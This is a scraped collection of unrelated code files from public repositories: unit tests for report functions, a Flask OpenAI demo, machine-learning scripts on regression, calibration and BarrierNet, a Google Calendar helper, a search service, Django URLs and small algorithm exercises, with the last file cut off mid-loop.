self.assertEqual(fn.LCase(None), None)\n self.assertEqual(fn.UCase('To Upper'), 'TO UPPER')\n self.assertEqual(fn.UCase(None), None)\n self.assertEqual(fn.Len(''), 0)\n self.assertEqual(fn.Len('Get Lenght'), 10)\n self.assertEqual(fn.Len(None), None)\n self.assertEqual(fn.LTrim(''), '')\n self.assertEqual(fn.LTrim(' '), '')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim('LTrim '), 'LTrim ')\n self.assertEqual(fn.RTrim(''), '')\n self.assertEqual(fn.RTrim(' '), '')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim(' RTrim'), ' RTrim')\n self.assertEqual(fn.Trim(''), 
'')\n self.assertEqual(fn.Trim(' '), '')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n\n mid_test = 'Mid Function Demo'\n self.assertEqual(fn.Mid(mid_test, 1, 3), 'Mid')\n self.assertEqual(fn.Mid(mid_test, 14, 4), 'Demo')\n self.assertEqual(fn.Mid(mid_test, 5), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 5, 150), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 150), '')\n\n replace_test = 'abc def abc hij klm'\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx'), 'xxx def xxx hij klm')\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx', 1), 'xxx def abc hij klm')\n\n self.assertEqual(fn.String(5, 'x'), 'xxxxx')\n self.assertEqual(fn.String(0, 'x'), '')\n\n # Test functions in report\n\n report = Report(self._get_functios_xml())\n report.run()\n\n def _get_functios_xml(self):\n return r'''\n<Nuntiare>\n <Name>Functions tests</Name>\n <Page></Page>\n <Body>\n <ReportItems>\n <Tablix>\n <Name>grid_functions</Name>\n <TablixColumnHierarchy>\n <TablixMembers>\n <TablixMember/>\n </TablixMembers>\n </TablixColumnHierarchy>\n <TablixRowHierarchy>\n <TablixMembers>\n <TablixMember/>\n </TablixMembers>\n </TablixRowHierarchy>\n <TablixBody>\n <TablixColumns>\n <TablixColumn>\n <Width>5mm</Width>\n </TablixColumn>\n <TablixColumn>\n <Width>5mm</Width>\n </TablixColumn>\n </TablixColumns>\n <TablixRows>\n <TablixRow>\n <Height>5mm</Height>\n <TablixCells>\n <TablixCell>\n <CellContents>\n <ReportItems>\n <Textbox>\n <Name>cbool</Name>\n <Value>=CBool('true')</Value>\n </Textbox>\n </ReportItems>\n </CellContents>\n </TablixCell>\n <TablixCell>\n <CellContents>\n <ReportItems>\n <Textbox>\n <Name>cfloat</Name>\n <Value>=CFloat('1.99')</Value>\n </Textbox>\n </ReportItems>\n </CellContents>\n </TablixCell>\n </TablixCells>\n </TablixRow>\n </TablixRows>\n </TablixBody>\n </Tablix>\n </ReportItems>\n </Body>\n</Nuntiare>\n'''\n","repo_name":"formateli/nuntiare","sub_path":"tests/unittest/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72991219527","text":"'''\nCreate a flask app that has a textbox and a button. 
When the button is clicked, the text in the textbox is sent to the OpenAI API and the response is displayed on the page.\n'''\nfrom flask import Flask, render_template, request\nfrom gpt import GPT, Example\nimport openai\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n prompt = request.form['prompt']\n openai.api_key = \"\"\n gpt = GPT(engine=\"davinci\", temperature=0.5, max_tokens=100)\n output = gpt.submit_request(prompt)\n return render_template('index.html', output=output.choices[0].text)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Tominium/GPT3-Sandbox","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21359318333","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 1 13:36:23 2022\r\n\r\n@author: ramav\r\n\"\"\"\r\n#SIMPLE LINEAR REGREESSION\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\ndf.isnull().sum()\r\n\r\n\r\nx = df.iloc[:,:1].values\r\ny = df.iloc[:,-1].values\r\n\r\n#EDA\r\nplt.scatter(x, y, color=\"red\")\r\nplt.title(\" relation between salary and experience\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nplt.boxplot(x)\r\nplt.show()\r\nplt.hist(x)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.25,random_state=0)\r\nx_train.shape\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train, y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\nLR.intercept_.round(3) #Bo\r\nLR.coef_.round(3) #B1\r\n\r\n\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_test = LR.predict(x_test)\r\n\r\ny_pred_train\r\ny_pred_test\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y_train,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_train,y_pred_train).round(2)*100) #96\r\n\r\n\r\nmse1 = mean_squared_error(y_test,y_pred_test)\r\nRMSE1= np.sqrt(mse1)\r\nprint(\"Root mean square :\", RMSE1.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_test,y_pred_test).round(2)*100)\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_train,y_pred_train,color=\"red\")\r\nplt.title(\"training scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_test,y_pred_test,color=\"red\")\r\nplt.title(\"test scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\n# x and y variable\r\nx = df[\"YearsExperience\"]\r\ny = df[\"Salary\"]\r\n\r\n\r\n#split as train and test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = 
train_test_split(x,y,test_size=0.30,random_state=42)\r\n\r\nx_train.shape\r\n\r\n#scatter plot between x and y\r\ndf.plot(kind=\"scatter\",x=\"YearsExperience\",y=\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x,y,color=\"red\",edgecolors=\"orange\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#box plot to know outliers\r\ndf.plot(kind=\"box\")\r\nplt.show()\r\n\r\ndf.corr()\r\n\r\n# Dataframe\r\nx_train = pd.DataFrame(x_train)\r\ny_train= pd.DataFrame(y_test)\r\n\r\nx_ test= pd.DataFrame(x_test)\r\ny_test= pd.DataFrame(y_test)\r\n\r\n\r\n\r\n# model fitting\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train,y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\n\r\nLR.intercept_.round(3)\r\nLR.coef_.round(3)\r\n\r\nLR.score(x,y).round(3)\r\n\r\n#prediction\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_train\r\n\r\ny_pred_test = LR.predict(x_test)\r\ny_pred_test\r\n\r\n#comparsion between y actual and y_pred by using scatter plot\r\nplt.scatter(x=x.iloc[:,0],y=y,color=\"red\")\r\nplt.plot(x.iloc[:,0], y_pred_train,color=\"blue\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"salary\")\r\nplt.show()\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2))\r\n\r\nprint(\"R square:\",r2_score(y,y_pred).round(2)*100)\r\n\r\n'''\r\n","repo_name":"ajithsinghr/Build-a-prediction-model-for-salary-hike-Simple-linear-regression","sub_path":"solved Sal_data.py","file_name":"solved Sal_data.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5109464108","text":"class Solution(object):\n def anagramMappings(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: List[int]\n \"\"\"\n dic = {}\n \n for i,n in enumerate(B):\n dic.setdefault(n, []).append(i)\n \n \n return [dic.get(n).pop(0) for n in A]\n","repo_name":"simonzg/leetcode-solutions","sub_path":"760.Find_Anagram_Mappings.py","file_name":"760.Find_Anagram_Mappings.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20984391504","text":"# Python3\n# Create date: 2023-06-15\n# Author: Scc_hy\n# Func: 保序回归\n# ==============================================================================================\n\n# calibration_curve PLOT\n# -------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.calibration import calibration_curve\nnp.random.seed(2023)\n\n\ny_true = np.random.randint(0, 2, size=1000)\ny_pred = np.random.binomial(n=200, p=0.19, size=1000)\ny_pred = (y_pred - y_pred.min())/(y_pred.max()-y_pred.min())\ny_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n)\n\n# 分割图片 2:1\nfig = plt.figure(constrained_layout=True, figsize=(16, 4))\ngs = fig.add_gridspec(1, 3)\naxes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n# 绘制分布\nsns.histplot(y_pred, alpha=0.7, ax=axes1)\nfor i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\naxes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\naxes1.set_xlabel('Predicted probability')\n# 
绘制对准曲线\naxes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\naxes2.plot(proba_means, y_means, linestyle='-.')\naxes2.set_title('Simplr Predict Calibrator')\naxes2.legend()\naxes2.set_xlabel(\"Bin's mean of predicted probability\")\naxes2.set_ylabel(\"Bin's mean of target variable\")\nplt.show()\n\n\ndef quick_calibration_plot(y_true, y_pred, title_msg=''):\n y_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n )\n # 分割图片 2:1\n fig = plt.figure(constrained_layout=True, figsize=(16, 4))\n gs = fig.add_gridspec(1, 3)\n axes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n # 绘制分布\n sns.histplot(y_pred, alpha=0.7, ax=axes1)\n for i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\n axes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\n axes1.set_xlabel('Predicted probability')\n # 绘制对准曲线\n axes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\n axes2.plot(proba_means, y_means, linestyle='-.')\n axes2.set_title(f'Simple Predict Calibrator\\n{title_msg}')\n axes2.legend()\n axes2.set_xlabel(\"Bin's mean of predicted probability\")\n axes2.set_ylabel(\"Bin's mean of target variable\")\n plt.show()\n \n\n# 校准试验\n# -------------------------------\ndef expected_calibration_error(y, proba, bins = 'fd'):\n bin_count, bin_edges = np.histogram(proba, bins = bins)\n n_bins = len(bin_count)\n bin_edges[0] -= 1e-8 # because left edge is not included\n bin_id = np.digitize(proba, bin_edges, right = True) - 1\n bin_ysum = np.bincount(bin_id, weights = y, minlength = n_bins)\n bin_probasum = np.bincount(bin_id, weights = proba, minlength = n_bins)\n bin_ymean = np.divide(bin_ysum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n bin_probamean = np.divide(bin_probasum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n ece = np.abs((bin_probamean - bin_ymean) * bin_count).sum() / len(proba)\n return ece\n\n\n# 模型简单拟合\nfrom sklearn.datasets import make_classification\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nX, y = make_classification(\n n_samples = 15000, \n n_features = 50, \n n_informative = 30, \n n_redundant = 20,\n weights = [.9, .1],\n random_state = 0\n)\nX_train, X_valid, X_test = X[:5000], X[5000:10000], X[10000:]\ny_train, y_valid, y_test = y[:5000], y[5000:10000], y[10000:]\nforest = RandomForestClassifier().fit(X_train, y_train)\nproba_valid = forest.predict_proba(X_valid)[:, 1]\n\n# 保序回归\niso_reg = IsotonicRegression(y_min = 0, y_max = 1, out_of_bounds = 'clip').fit(proba_valid, y_valid)\ntest_pred = forest.predict_proba(X_test)[:, 1]\nece_org = expected_calibration_error(y_test, test_pred, bins = 'fd')\nquick_calibration_plot(y_test, test_pred, title_msg=f'not  calibration ECE={ece_org:.3f}')\n\nproba_test_forest_isoreg = iso_reg.predict(test_pred)\nece_iosreg = expected_calibration_error(y_test, proba_test_forest_isoreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_isoreg, title_msg=f'IsotonicRegression ECE={ece_iosreg:.3f}')\n\n# logistic\nlog_reg = LogisticRegression().fit(proba_valid.reshape(-1, 1), y_valid)\nproba_test_forest_logreg = log_reg.predict_proba(test_pred.reshape(-1, 1))[:, 1]\n\nece_logreg = expected_calibration_error(y_test, proba_test_forest_logreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_logreg, title_msg=f'IsotonicRegression 
ECE={ece_logreg:.3f}')","repo_name":"scchy/CSDN","sub_path":"保序回归New.py","file_name":"保序回归New.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24851150742","text":"# for 문\n# 1. 형식\n# for 변수 in 반복객체:\n# 반복실행문\n# 2. 반복객체\n# 리스트, 튜플, 세트, 사전, 문자열, 정수집합(range)\n# 3. 정수집합(range)\n# 1) range(10) : 0 ~ 9\n# 2) range(1, 10) : 1 ~ 9\n# 3) range(1, 10, 2) : 1, 3, 5, 7, 9\n\nfor a in [1, 2, 3]:\n print(a)\n\nfor b in (1, 2, 3):\n print(b)\n\nfor c in 'Hello':\n print(c)\n\nfor d in range(10):\n print(d)\n\nmy_list = [1, 2, 3, 4, 5]\nfor idx in range(len(my_list)):\n print(my_list[idx])\n\n# 이름 따로, 나이 따로 출력\nmy_list = [('에밀리', 20), ('제임스', 25)]\nfor person in my_list:\n for p in person:\n print(p)\n","repo_name":"hwangseokjin94/gitstudy","sub_path":"pythonstudy/workspace/day02/EX12_for.py","file_name":"EX12_for.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39014700329","text":"from src.schemas.response import HTTPResponses, HttpResponseModel\nfrom src.schemas.album import AlbumCreateModel\nfrom src.db.__init__ import database as db\nfrom src.service.impl.song_service import SongService\nfrom src.service.impl.album_service import AlbumService\n\n\nclass FiltersService:\n\n @staticmethod\n def get_filters(name: str = None, year: int = None, genre: str = None):\n albums_titles = set()\n songs_titles = set()\n\n if name:\n res1 = AlbumService.get_album_by_name(name)\n res2 = SongService.get_songs_by_name(name)\n res3 = SongService.get_by_artist(name)\n res4 = AlbumService.get_by_artist(name)\n\n if res1 is None:\n res1 = []\n if res2 is None:\n res2 = []\n if res3 is None:\n res3 = []\n if type(res1) is dict:\n res1 = [res1]\n if type(res2) is dict:\n res2 = [res2]\n if type(res3) is dict:\n res3 = [res3]\n\n albums_titles |= {album['id'] for album in res1}\n\n albums_titles |= {album['id'] for album in res4}\n\n songs_titles |= {song['id']\n for song in res2}\n songs_titles |= {song['id']\n for song in res3}\n if year:\n\n res1 = AlbumService.get_by_year(year)[\n 'songs']\n res2 = SongService.get_by_year(year)[\n 'songs']\n\n albums_by_year_titles = {album['id'] for album in res1}\n songs_by_year_titles = {song['id'] for song in res2}\n\n # print(albums_by_year_titles)\n # print(songs_by_year_titles)\n\n # Se o nome for fornecido, fazemos a interseção com os álbuns filtrados por nome\n if name:\n albums_titles &= albums_by_year_titles\n songs_titles &= songs_by_year_titles\n\n else:\n albums_titles = albums_by_year_titles\n songs_titles = songs_by_year_titles\n\n if genre:\n print(\"procurando por genero\")\n\n res1 = AlbumService.get_by_genre(genre)['songs']\n res2 = SongService.get_by_genre(genre)['songs']\n\n albums_by_genre_titles = {\n album['id'] for album in res1}\n songs_by_genre_titles = {song['id']\n for song in res2}\n\n # Se o nome ou ano forem fornecidos, fazemos a interseção com os álbuns já filtrados\n if name or year:\n albums_titles &= albums_by_genre_titles\n songs_titles &= songs_by_genre_titles\n\n else:\n albums_titles = albums_by_genre_titles\n songs_titles = songs_by_genre_titles\n\n # Obtendo os álbuns e músicas completos com os títulos filtrados\n all_albums = AlbumService.get_albums()\n all_songs = SongService.get_songs()\n\n albums = [album for album in all_albums if album['id'] in albums_titles]\n songs = [song for song in all_songs if song['id'] in 
songs_titles]\n\n # delete the id key from the response\n # for album in albums:\n # del album['id']\n # for song in songs:\n # del song['id']\n\n response = {\n 'albums': albums,\n 'songs': songs,\n }\n\n return response\n","repo_name":"lumendesp/groove-app","sub_path":"backend/src/service/impl/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40373142172","text":"#!/usr/bin/env python3\n\nimport os\nimport pickle\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\n\nSCOPES = [\n \"https://www.googleapis.com/auth/calendar\",\n \"https://www.googleapis.com/auth/calendar.readonly\",\n]\nCREDENTIALS_FILE = \".gcal.credentials.json\"\nTOKEN_FILE = \".gcal.token.json\"\n\n\nclass GCal:\n def __init__(self):\n self.service = self.make_calendar_service()\n self.workflowy_calendar_id = self.get_calendar_id(\"workflowy\")\n\n def make_calendar_service(self):\n creds = None\n if os.path.exists(TOKEN_FILE):\n creds = Credentials.from_authorized_user_file(TOKEN_FILE, SCOPES)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES\n )\n creds = flow.run_local_server(port=0)\n with open(TOKEN_FILE, \"w\") as token:\n token.write(creds.to_json())\n return build(\"calendar\", \"v3\", credentials=creds)\n\n def get_calendar_id(self, calendar_name):\n calendar_list = self.service.calendarList().list(pageToken=None).execute()\n for calendar_list_entry in calendar_list[\"items\"]:\n if calendar_list_entry[\"summary\"] == \"workflowy\":\n return calendar_list_entry[\"id\"]\n raise Exception(\"workflowy calendar not found\")\n\n def get_events(self):\n events_result = (\n self.service.events()\n .list(calendarId=self.workflowy_calendar_id, maxResults=10)\n .execute()\n )\n return events_result.get(\"items\", [])\n\n def get_event(self, uuid):\n uuid = uuid.replace(\"-\", \"\")\n try:\n return (\n self.service.events()\n .get(calendarId=self.workflowy_calendar_id, eventId=uuid)\n .execute()\n )\n except:\n return None\n\n def insert_event(self, uuid, summary, start, end):\n print(f\"inserting event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().insert(\n calendarId=self.workflowy_calendar_id, body=event\n ).execute()\n # print(f\"Event created: {event.get('htmlLink')}\")\n\n def update_event(self, uuid, summary, start, end):\n print(f\"update event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().update(\n calendarId=self.workflowy_calendar_id, eventId=uuid, 
body=event\n ).execute()\n","repo_name":"nhardt/workflowy-to-google-calendar","sub_path":"lib/GCal.py","file_name":"GCal.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13800480195","text":"from chapter1.Bag import Bag\n\n\nclass EdgeWeightedGraph:\n def __init__(self, V):\n \"\"\"\n Args:\n V: int, 顶点总数\n \"\"\"\n self.V = V\n self.E = 0\n self.adj = [Bag() for _ in range(V)]\n\n def add_edge(self, e):\n \"\"\"\n Args:\n e: Edge\n \"\"\"\n v = e.either()\n w = e.other(v)\n self.adj[v].add(e)\n self.adj[w].add(e)\n self.E += 1\n\n def edges(self):\n \"\"\"\n Return:\n Iterable<Edge>\n \"\"\"\n b = Bag()\n for v in range(self.V):\n for e in self.adj[v]:\n if e.other(v) > v:\n b.add(e)\n return b ","repo_name":"AiZhanghan/Algorithms-Fourth-Edition","sub_path":"code/chapter4/EdgeWeightedGraph.py","file_name":"EdgeWeightedGraph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1998341823","text":"from django.conf.urls import patterns, url, include\nfrom django.views.generic import TemplateView\n\nurlpatterns=patterns('home.views',\n #HOME\n url(r'^$','index_view', name='vista_principal'),\n #estaticos\n url(r'^humans.txt$', TemplateView.as_view(template_name='statics/humans.txt', content_type='text/plain; charset=utf-8')),\n url(r'^robots.txt$', TemplateView.as_view(template_name='statics/robots.txt', content_type='text/plain; charset=utf-8')),\n url(r'^sitemap.xml$', TemplateView.as_view(template_name='statics/sitemap.xml', content_type='application/xml; charset=utf-8')),\n #secciones\n url(r'^lo-que-hacemos/$', 'loqueHacemos'),\n url(r'^lo-que-hacemos/ux-ui-design/$', 'uxDesign'),\n url(r'^lo-que-hacemos/ecommerce/$', 'eCommerce'),\n url(r'^lo-que-hacemos/websites/$', 'webSites'),\n url(r'^lo-que-hacemos/marketing-online/$', 'marketingOnline'),\n url(r'^lo-que-hacemos/aplicaciones-web/$', 'appWeb'),\n #secciones\n url(r'^nuestro-trabajo/$', 'portafolio'),\n url(r'^contacto/$', 'contacto'),\n url(r'^about-us/$', 'aboutUS'),\n url(r'^expo-guadalajara/$', 'landing'),\n\n #Equipo y sus paginas.\n url(r'^team/$', 'team'),\n url(r'^alen/$', 'alen'),\n url(r'^jesus/$', 'chucho'),\n url(r'^luciano/$', 'luciano'),\n #REDirects\n url(r'^blog/$', 'blogRedirect'),\n url(r'^facebook/$', 'facebookRedirect'),\n url(r'^twitter/$', 'twitterRedirect'),\n url(r'^g\\+/$', 'gplusRedirect'),\n url(r'^map/$', 'blogRedirect'),\n url(r'^fcq/$', 'blogRedirect'),\n\n)","repo_name":"xtornasol512/phyro","sub_path":"back-end/phyro/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3689181864","text":"import torch\nimport torch.nn as nn\nfrom my_classes import Dataset_list as Dataset\nimport scipy.io as sio\nimport models\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nplt.style.use('bmh')\n\nbarriernet = 1\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Using {} device\".format(device))\ntorch.backends.cudnn.benchmark = True\n\n\n# Datasets from mat\ntrain_data = sio.loadmat('data/data_train_ocbf.mat')\ntrain_data = train_data['data_train_ocbf'] # data_train for oc controller\ntest_data = 
sio.loadmat('data/data_test_ocbf.mat')\ntest_data = test_data['data_test_ocbf'] # data_test for oc controller\nimpl_data = sio.loadmat('data/data_ip.mat')\nimpl_data = impl_data['data_ip']\n\ntrain0 = np.float32(train_data[:,0:4]) # x_ip, v_ip, x_i, v_i\ntrain_labels = np.reshape(np.float32(train_data[:,4]), (len(train_data),1))\ntest0 = np.float32(test_data[:,0:4])\ntest_labels = np.reshape(np.float32(test_data[:,4]), (len(test_data),1))\nimpl0 = np.float32(impl_data)\ninit = train0[0]\n\n# data normalization\nmean = np.mean(train0, axis = 0)\nstd= np.std(train0, axis = 0)\ntrain0 = (train0 - mean)/std\ntest0 = (test0 - mean)/std\nimpl0 = (impl0 - mean)/std\n\n\n# Parameters\nparams = {'batch_size': 32,\n 'shuffle': True,\n 'num_workers': 12}\n\n# Generators\ntraining_set = Dataset(train0, train_labels)\ntrain_dataloader = torch.utils.data.DataLoader(training_set, **params)\n\ntest_set = Dataset(test0, test_labels)\ntest_dataloader = torch.utils.data.DataLoader(test_set, **params)\n\n\n# Initialize the model.\nnFeatures, nHidden1, nHidden21, nHidden22, nCls = 4, 72, 24, 24, 1\nif (barriernet == 1):\n model = models.BarrierNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nelse:\n model = models.FCNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nprint(model)\n\n# Initialize the optimizer.\nlearning_rate = 1e-3\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) #Adam\nloss_fn = nn.MSELoss()\n\n\ndef train(dataloader, model, loss_fn, optimizer, losses):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n \n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n losses.append(loss.item())\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 25 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n return losses\n\ndef test(dataloader, model, loss_fn, losses):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n loss = loss_fn(pred, y)\n test_loss += loss.item()\n test_loss /= num_batches\n losses.append(test_loss)\n print(f\"Test avg loss: {test_loss:>8f} \\n\")\n return losses\n\n \nepochs = 20 \ntrain_losses, test_losses = [], []\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train_losses = train(train_dataloader, model, loss_fn, optimizer, train_losses)\n test_losses = test(test_dataloader, model, loss_fn, test_losses)\nprint(\"Training Done!\")\n\n\n#save model\nif (barriernet == 1):\n torch.save(model.state_dict(), \"model_ocbf_bn.pth\")\nelse:\n torch.save(model.state_dict(), \"model_ocbf_fc.pth\")\nprint(\"Saved PyTorch Model State to xx.pth\")\n\n\n# on the test dataset\nmodel.eval()\npredic, actual, t = [], [], []\nt0 = 0\n\nwith torch.no_grad():\n for i in range(len(test0)):\n x, y = Variable(torch.from_numpy(test0[i]), requires_grad=False), test_labels[i]\n x = torch.reshape(x, (1,nFeatures))\n x = x.to(device)\n pred = model(x)\n predic.append(pred.item())\n actual.append(y)\n t.append(t0)\n t0 = t0 + 0.06\nprint(\"Test done!\") \n\npos, vel = init[2], init[3]\ntr, tr0 = [], 0\nimplem, safety, lb = [], [], []\ndt = 0.1\n\n# running on a vehicle\nwith torch.no_grad():\n for i in 
